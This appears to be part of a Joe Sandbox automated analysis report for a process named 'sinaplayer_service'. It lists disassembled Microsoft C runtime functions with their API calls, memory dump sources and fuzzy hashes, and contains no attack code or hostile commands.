                                                                                                                                                                                                    • API String ID: 1259114276-0
                                                                                                                                                                                                    • Opcode ID: a9067abcc70cf1ef48ea8872f26292c067949d49df4be31a54735ebc58db8a99
                                                                                                                                                                                                    • Instruction ID: ea001ed8e1e4348aeb2c21b03cb7bb126c1a73f16fe8b787a43f3356b800d554
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a9067abcc70cf1ef48ea8872f26292c067949d49df4be31a54735ebc58db8a99
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6951D931D09206EFFB219AB6CC40BBF77F8AF59354F515529E925EB281DB31D8408BA0
                                                                                                                                                                                                    Function 6D0A4CD6 Relevance: 21.2, APIs: 14, Instructions: 176threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6D0A4CDD
                                                                                                                                                                                                    • ??0_ReentrantBlockingLock@details@Concurrency@@QAE@XZ.MSVCR120(00000004,6D0A4EF7,00000000,?,00000000), ref: 6D0A4CFB
                                                                                                                                                                                                      • Part of subcall function 6D0A5C29: __crtInitializeCriticalSectionEx.MSVCR120(?,00000000,00000180,6D0A4ACC,?,?,?,?,?,?,?,?,?,?,6D094938,000000FF), ref: 6D0A5C35
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000001,00000004,6D0A4EF7,00000000,?,00000000), ref: 6D0A4D4C
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000002,00000001,00000004,6D0A4EF7,00000000,?,00000000), ref: 6D0A4D5B
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000003,00000002,00000001,00000004,6D0A4EF7,00000000,?,00000000), ref: 6D0A4D6A
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000005,00000003,00000002,00000001,00000004,6D0A4EF7,00000000,?,00000000), ref: 6D0A4D79
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000006,00000005,00000003,00000002,00000001,00000004,6D0A4EF7,00000000,?,00000000), ref: 6D0A4D88
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000008,00000006,00000005,00000003,00000002,00000001,00000004,6D0A4EF7,00000000,?,00000000), ref: 6D0A4D97
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000838), ref: 6D0A4E4D
                                                                                                                                                                                                      • Part of subcall function 6D08EE11: malloc.MSVCR120(?), ref: 6D08EE1A
                                                                                                                                                                                                    • Concurrency::details::HillClimbing::HillClimbing.LIBCMT ref: 6D0A4E60
                                                                                                                                                                                                    • ?GetProcessorNodeCount@Concurrency@@YAIXZ.MSVCR120 ref: 6D0A4E68
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000), ref: 6D0A4E85
                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 6D0D3476
                                                                                                                                                                                                    • GetThreadPriority.KERNEL32(00000000), ref: 6D0D347D
                                                                                                                                                                                                      • Part of subcall function 6D0A58DA: __EH_prolog3.LIBCMT ref: 6D0A58E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Policy$Concurrency@@$ElementKey@2@@Policy@SchedulerValue@$H_prolog3HillThread$??0_??2@BlockingClimbingClimbing::Concurrency::details::Count@CriticalCurrentInitializeLock@details@NodePriorityProcessorReentrantSection__crtmalloc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1717548414-0
                                                                                                                                                                                                    • Opcode ID: d62baaa546efeaf8ba12899507b742e0b7d3f3cafead1fd055f5dcc4ba90b7eb
                                                                                                                                                                                                    • Instruction ID: 8197289d778bd806f8c7b9564803c02a688ce8f6934de8a7e358ce6c8e10e78a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d62baaa546efeaf8ba12899507b742e0b7d3f3cafead1fd055f5dcc4ba90b7eb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B1611CB5B04A12AFE748CF79C445799FBE1BF89304F45822EE56DCB641DB74A424CB80
                                                                                                                                                                                                    Function 6D09CCA8 Relevance: 21.2, APIs: 14, Instructions: 152COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _fileno$__cftof
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 813615167-0
                                                                                                                                                                                                    • Opcode ID: 5c73e61711a2e1b25186c54213cbdfa477a3d9890ccd1e5b6bef835b7ebb643d
                                                                                                                                                                                                    • Instruction ID: e6117487286940dfab8b41ba47c53e7993ba5ea8da202a3bb9642a9efab1fa77
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5c73e61711a2e1b25186c54213cbdfa477a3d9890ccd1e5b6bef835b7ebb643d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF41797280821AAAF7014BF89C8077F77A4BE4A7343690319E6749F1E2EB34E402D754
                                                                                                                                                                                                    Function 6D0ABD99 Relevance: 21.1, APIs: 14, Instructions: 121COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _getdrive.MSVCR120(?,?,?), ref: 6D0ABDBD
                                                                                                                                                                                                      • Part of subcall function 6D094728: GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 6D094754
                                                                                                                                                                                                    • GetFullPathNameW.KERNEL32(?,00000000,?,?,?,?,?), ref: 6D0ABE0D
                                                                                                                                                                                                    • __validdrive.LIBCMT ref: 6D0D47CA
                                                                                                                                                                                                    • __doserrno.MSVCR120(?,?,?), ref: 6D0D47D8
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?), ref: 6D0D47E3
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,?), ref: 6D0D47EE
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?), ref: 6D0D47F8
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$CurrentDirectoryFullNamePath__doserrno__validdrive_getdrive_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4038912475-0
                                                                                                                                                                                                    • Opcode ID: 04ccba70cf81e86e7a84a254cac3469cff66e2fe0a87dcf337e5c72a3c1fc032
                                                                                                                                                                                                    • Instruction ID: 602895ecb528cd93ccf61603106b83f66314eaeb8f1d2238b71ff6326f6e1e33
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 04ccba70cf81e86e7a84a254cac3469cff66e2fe0a87dcf337e5c72a3c1fc032
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3318F75A1838AAAFB41DFF8D84076E73F8EF49750F22545BDA14DB250EB70C9008B66
                                                                                                                                                                                                    Function 6D0A5BD8 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 94threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 6D0A5BDF
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(6D160A9C,6D160AB8,00000024,6D0D26F0,?,00000000,00000000,?,?,?,?,6D0A58C9,00000004,6D0A692E,?,00000000), ref: 6D0A5BEE
                                                                                                                                                                                                    • GetProcessAffinityMask.KERNEL32(00000000,?,00000000), ref: 6D0A5BF5
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,?,6D0A58C9,00000004,6D0A692E,?,00000000,?,6D0A69B0,00000002,00000001), ref: 6D0D24D8
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,00000000,00000000,?,?,?,?,6D0A58C9,00000004,6D0A692E,?,00000000,?,6D0A69B0,00000002), ref: 6D0D24EE
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CF40,00000000,?,00000000,00000000,?,?,?,?,6D0A58C9,00000004,6D0A692E,?,00000000), ref: 6D0D24FC
                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 6D0D250A
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(0000000C,00000000), ref: 6D0D251B
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000008,00000000), ref: 6D0D2544
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@CurrentProcess$AffinityConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorExceptionH_prolog3_LastMaskThreadThrow
                                                                                                                                                                                                    • String ID: .im
                                                                                                                                                                                                    • API String ID: 1331674153-4014146257
                                                                                                                                                                                                    • Opcode ID: 293e6501001e5b3af86aa4bea7ff21f8863e0f96ee11090e63ddffa3c1593119
                                                                                                                                                                                                    • Instruction ID: 731b14328571dc9e534bd6a75c6d32908b9acedd97fd9998a28f8a1fff2cd059
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 293e6501001e5b3af86aa4bea7ff21f8863e0f96ee11090e63ddffa3c1593119
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B431D1755257529FFB54DFB9D814B3EB3B0BF0A705B01852AEA05DB149EB7084408761
                                                                                                                                                                                                    Function 6D0B3FD0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 93COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DecodePointer.KERNEL32(00000000,?,6D0B42D0,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0B3FFF
                                                                                                                                                                                                    • free.MSVCR120(005C2D90,?,6D0B42D0,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0B4018
                                                                                                                                                                                                      • Part of subcall function 6D08ECE0: HeapFree.KERNEL32(00000000,00000000,?,6D0D3D3A,00000000,6D091782,6D0FB407,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D08ECF4
                                                                                                                                                                                                    • free.MSVCR120(005C2D90,?,?,6D0B42D0,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0B402B
                                                                                                                                                                                                    • free.MSVCR120(005C2A20,?,?,6D0B42D0,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0B4049
                                                                                                                                                                                                    • free.MSVCR120(005C2A20,?,?,6D0B42D0,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0B405B
                                                                                                                                                                                                    • free.MSVCR120(005C2A20,?,?,6D0B42D0,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0B406C
                                                                                                                                                                                                    • free.MSVCR120(005C2A20,?,?,6D0B42D0,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0B4077
                                                                                                                                                                                                    • free.MSVCR120(00000000), ref: 6D0B409B
                                                                                                                                                                                                    • EncodePointer.KERNEL32(005C2A20), ref: 6D0B40A2
                                                                                                                                                                                                    • free.MSVCR120(005C74F0), ref: 6D0B40E3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$Pointer$DecodeEncodeFreeHeap
                                                                                                                                                                                                    • String ID: *\$y[
                                                                                                                                                                                                    • API String ID: 2148159843-1414595890
                                                                                                                                                                                                    • Opcode ID: a7ca654c7ed67eac2cf99b85fe9de70179fea6dc12b0ac930e252fab7c7eb89c
                                                                                                                                                                                                    • Instruction ID: aedca0edbe909db47dc7eb897eddd30c8448bb24b8be370374039ae1fedbecfa
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a7ca654c7ed67eac2cf99b85fe9de70179fea6dc12b0ac930e252fab7c7eb89c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3031B9B1909252AFEF019F64F841B6E37F0FF0B328702046AFAA097151D7BA9951CBD4
                                                                                                                                                                                                    Function 6D0A6F10 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 74memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • TlsAlloc.KERNEL32 ref: 6D0A6F16
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D2045
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D205B
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D2069
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D206F
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(?,?,?,?,?,?,6D0A6C5D), ref: 6D0D20B5
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CF40,?,?,?,?,?,?,6D0A6C5D), ref: 6D0D20C3
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6D15CF40,?,?,?,?,?,?,6D0A6C5D), ref: 6D0D20C9
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D20DF
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D20ED
                                                                                                                                                                                                    • ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR120(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D20F3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorExceptionLastThrow$Version@$AllocConcurrency@@Manager@1@Resource
                                                                                                                                                                                                    • String ID: ]lm
                                                                                                                                                                                                    • API String ID: 3870855575-2416103240
                                                                                                                                                                                                    • Opcode ID: 0c40ba44376360dd5b6922c2ce0c9a73e9c2ed43e0632c169e9cc33f1b6aea44
                                                                                                                                                                                                    • Instruction ID: e7a4e9e3f6496fbb77d8753cb31e309957289f8a521ac95fb99a581dc53f43c3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c40ba44376360dd5b6922c2ce0c9a73e9c2ed43e0632c169e9cc33f1b6aea44
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 15113B7550421A5FF720EAF69C44B7FBBACBF012547500512FA15E704AEB25C400C6F5
                                                                                                                                                                                                    Function 6D0A6DB6 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 46libraryloaderCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegisterTraceGuidsW), ref: 6D0A6D45
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,UnregisterTraceGuids), ref: 6D0A6D57
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,TraceEvent), ref: 6D0A6D6A
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetTraceLoggerHandle), ref: 6D0A6D7D
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetTraceEnableLevel), ref: 6D0A6D90
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetTraceEnableFlags), ref: 6D0A6DA3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc
                                                                                                                                                                                                    • String ID: GetTraceEnableFlags$GetTraceEnableLevel$GetTraceLoggerHandle$RegisterTraceGuidsW$TraceEvent$UnregisterTraceGuids
                                                                                                                                                                                                    • API String ID: 190572456-1576993034
                                                                                                                                                                                                    • Opcode ID: 1d5de0a33a90cc53f517a7a439c06fff5cd7045146716702956972108d566445
                                                                                                                                                                                                    • Instruction ID: c4bb3e7c775873367c765e6f4bf28332e1606f5a9b968da4e6f0b12148e703b0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d5de0a33a90cc53f517a7a439c06fff5cd7045146716702956972108d566445
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C01F831A105509FDB5CDFBDD9E1A3A77F9FB85501348446FA40687386DBB5D800CB90
                                                                                                                                                                                                    Function 6D0F8CEC Relevance: 19.8, APIs: 13, Instructions: 290windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 6D0F8CF3
                                                                                                                                                                                                      • Part of subcall function 6D0F87CF: __EH_prolog3.LIBCMT ref: 6D0F87D6
                                                                                                                                                                                                      • Part of subcall function 6D0F87CF: Concurrency::details::ContextBase::CreateWorkQueue.LIBCMT ref: 6D0F87ED
                                                                                                                                                                                                      • Part of subcall function 6D0A3AF4: TlsGetValue.KERNEL32(6D0A3DF7,00000000,00000000,?,?,?,?,?,?,?,6D094938,000000FF), ref: 6D0A3AFA
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(?,?,?,00000074), ref: 6D0F8DA2
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6D0E7484,6D15CEB0), ref: 6D0F8DB7
                                                                                                                                                                                                    • Concurrency::details::ContextBase::IsCancellationVisible.LIBCMT ref: 6D0F8DE6
                                                                                                                                                                                                    • Concurrency::details::ContextBase::IsCancellationVisible.LIBCMT ref: 6D0F8E31
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(?,?,?,00000074), ref: 6D0F8E5D
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(?,?,?,00000074), ref: 6D0F8EDB
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(?,?,?,00000074), ref: 6D0F8F24
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??0exception@std@@$Base::Concurrency::details::Context$CancellationVisible$CreateExceptionH_prolog3H_prolog3_catchQueueThrowValueWork
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3898879344-0
                                                                                                                                                                                                    • Opcode ID: c4e1151aefced9191b53bc8cb336741b287c936a3da30353e6dfe29e3d971edf
                                                                                                                                                                                                    • Instruction ID: 8f2229de7af4b36dded831f6c7d9643f0f0e4018be23e2bfab46acb45e8f3cfd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c4e1151aefced9191b53bc8cb336741b287c936a3da30353e6dfe29e3d971edf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9AB16FB0A04209DFEB05DF6AC980BEDBBF2FF44344B658029E9559B261DB34E946CF40
                                                                                                                                                                                                    Function 6D09F94D Relevance: 19.6, APIs: 13, Instructions: 143COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _wcsnlen.LIBCMT(?,?,?,?,?,?,?,6D09F9DA,?,?,?,?), ref: 6D09F96D
                                                                                                                                                                                                    • __crtLCMapStringW.MSVCR120(?,00000200,?,000000FF,00000000,00000000,?,?,?,?,?,6D09F9DA,?,?,?,?), ref: 6D09FA0E
                                                                                                                                                                                                    • __crtLCMapStringW.MSVCR120(?,00000200,?,000000FF,00000000,00000000,?,6D09F9DA,?,?,?,?), ref: 6D09FA8A
                                                                                                                                                                                                    • wcscpy_s.MSVCR120(?,?,00000000,?,?,?,?,?,?,?,6D09F9DA,?,?,?,?), ref: 6D09FA9F
                                                                                                                                                                                                    • _freea_s.MSVCR120(00000000,?,?,?,?,?,?,?,?,?,?,6D09F9DA,?,?,?,?), ref: 6D09FAAA
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,?,6D09F9DA,?,?,?,?), ref: 6D0DADEC
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,?,?,?,6D09F9DA,?,?,?,?), ref: 6D0DADF6
                                                                                                                                                                                                    • _errno.MSVCR120(?,6D09F9DA,?,?,?,?), ref: 6D0DAE09
